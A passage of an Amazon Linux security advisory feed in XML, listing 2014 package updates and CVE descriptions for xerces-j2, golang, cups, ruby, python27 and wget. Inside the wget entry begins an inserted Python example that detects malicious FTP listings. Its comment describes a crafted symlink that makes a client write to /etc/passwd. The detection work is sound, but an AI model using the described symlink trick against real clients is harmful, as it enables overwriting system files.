arch="i686"><filename>Packages/php55-pdo-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.18" release="1.92.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.18" release="1.92.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-tidy-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.18-1.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-436</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-436: medium priority package update for xerces-j2</title><issued date="2014-10-28 17:13:00" /><updated date="2014-11-01 14:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4002:
A resource consumption issue was found in the way Xerces-J handled XML declarations. A remote attacker could use an XML document with a specially crafted declaration using a long pseudo-attribute name that, when parsed by an application using Xerces-J, would cause that application to use an excessive amount of CPU.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002" title="" id="CVE-2013-4002" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1319.html" title="" id="RHSA-2014:1319" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xerces-j2-javadoc-apis" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-javadoc-xni" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-javadoc-other" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-demo" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-demo-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-scripts" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-scripts-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-javadoc-impl" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-437</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-437: medium priority package update for golang</title><issued date="2014-10-28 17:15:00" /><updated 
date="2014-11-01 14:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7189:
crypto/tls in Go 1.1 before 1.3.2, when SessionTicketsDisabled is set to true, allows man-in-the-middle attackers to spoof clients via unspecified vectors.
1147324:
CVE-2014-7189 golang: TLS client authentication issue fixed in version 1.3.2
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7189" title="" id="CVE-2014-7189" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-pkg-netbsd-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-vim" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-vim-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang" version="1.3.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.3.3-1.7.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-linux-arm" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-arm-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-386" version="1.3.3" release="1.7.amzn1" epoch="0" 
arch="noarch"><filename>Packages/golang-pkg-openbsd-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-plan9-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-plan9-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-arm" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-arm-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="emacs-golang" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-golang-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-arm" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-arm-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-pkg-bin-linux-amd64-1.3.3-1.7.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-linux-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package 
name="golang-pkg-windows-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/golang-pkg-bin-linux-386-1.3.3-1.7.amzn1.i686.rpm</filename></package><package name="golang" version="1.3.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.3.3-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-438</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-438: medium priority package update for cups</title><issued date="2014-10-28 17:17:00" /><updated date="2014-11-01 14:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5031:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-5030:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-5029:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-3537:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-2856:
A cross-site scripting (XSS) flaw was found in the CUPS web interface. An attacker could use this flaw to perform a cross-site scripting attack against users of the CUPS web interface.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856" title="" id="CVE-2014-2856" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537" title="" id="CVE-2014-3537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029" title="" id="CVE-2014-5029" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030" title="" id="CVE-2014-5030" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031" title="" id="CVE-2014-5031" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1388.html" title="" id="RHSA-2014:1388" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-lpd" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-lpd" 
version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.20.al12.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-439</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-439: medium priority package update for ruby21</title><issued date="2014-11-05 12:13:00" /><updated date="2014-11-05 14:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8080:
The REXML parser in Ruby 1.9.x before 1.9.3-p550, 2.0.x before 2.0.0-p594, and 2.1.x before 2.1.4 allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document, aka an XML Entity Expansion (XEE) attack.
1157709:
CVE-2014-8080 ruby: REXML billion laughs attack via parameter entity expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8080" title="" id="CVE-2014-8080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-devel" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.14.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.2-1.14.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.2" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.2-1.14.amzn1.noarch.rpm</filename></package><package name="rubygems21-devel" version="2.2.2" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.2-1.14.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21-irb" version="2.1.4" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.4-1.14.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" 
version="2.1.4" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.4-1.14.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.4-1.14.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.14.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.4-1.14.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.2-1.14.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.14.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.4-1.14.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.4-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-440</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-440: medium priority package update for python27</title><issued date="2014-11-05 12:15:00" /><updated date="2014-11-11 10:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7185:
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function.
1146026:
CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
CVE-2014-4650:
1113527:
CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650" title="" id="CVE-2014-4650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7185" title="" id="CVE-2014-7185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.8" release="6.74.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-test-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.8-6.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-441</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-441: medium priority package update for ruby20</title><issued date="2014-11-05 12:16:00" /><updated date="2014-11-05 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8080:
The REXML parser in Ruby 1.9.x before 1.9.3-p550, 2.0.x before 2.0.0-p594, and 2.1.x before 2.1.4 allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document, aka an XML Entity Expansion (XEE) attack.
1157709:
CVE-2014-8080 ruby: REXML billion laughs attack via parameter entity expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8080" title="" id="CVE-2014-8080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems20" version="2.0.14" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.19.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.594-1.19.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.19.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.594-1.19.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.19.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.19.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-442</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-442: medium priority package update for wget</title><issued date="2014-11-05 12:19:00" /><updated date="2014-11-05 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4877:
Absolute path traversal vulnerability in GNU Wget before 1.16, when recursion is enabled, allows remote FTP servers to write to arbitrary files, and consequently execute arbitrary code, via a LIST response that references the same filename within two entries, one of which indicates that the filename is for a symlink.
1139181:
CVE-2014-4877 wget: FTP symlink arbitrary filesystem access
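How a recursive FTP client could detect the conflicting listing described above before it touches the filesystem, as an added Python example (this is not wget's code; the LIST lines, the /srv/mirror download root and the audit_listing name are constructed for this illustration):

```python
"""Added illustration for CVE-2014-4877 (not wget's code): parse a Unix-style FTP
LIST response the way a recursive mirroring client would, and flag listings
that would make the client create a symlink and then write through it, or
follow a symlink outside the download root. The LIST lines and the /srv/mirror
root below are constructed for this example."""
import posixpath
import re
from collections import defaultdict

# Unix ls-style LIST line: mode, link count, owner, group, size,
# month, day, year-or-time, then the name (with " -> target" for symlinks).
_LIST_RE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+"
    r"\w{3}\s+\d{1,2}\s+[\d:]+\s+(.+)$"
)

# Constructed sample: 'notes.txt' is listed twice, once as a symlink to an
# absolute path, once as a regular file. A client that creates the symlink
# first and then downloads the file writes through it to /etc/passwd.
SAMPLE_LISTING = """\
drwxr-xr-x 2 ftp ftp 4096 Oct 27 2014 docs
-rw-r--r-- 1 ftp ftp 1024 Oct 27 2014 README
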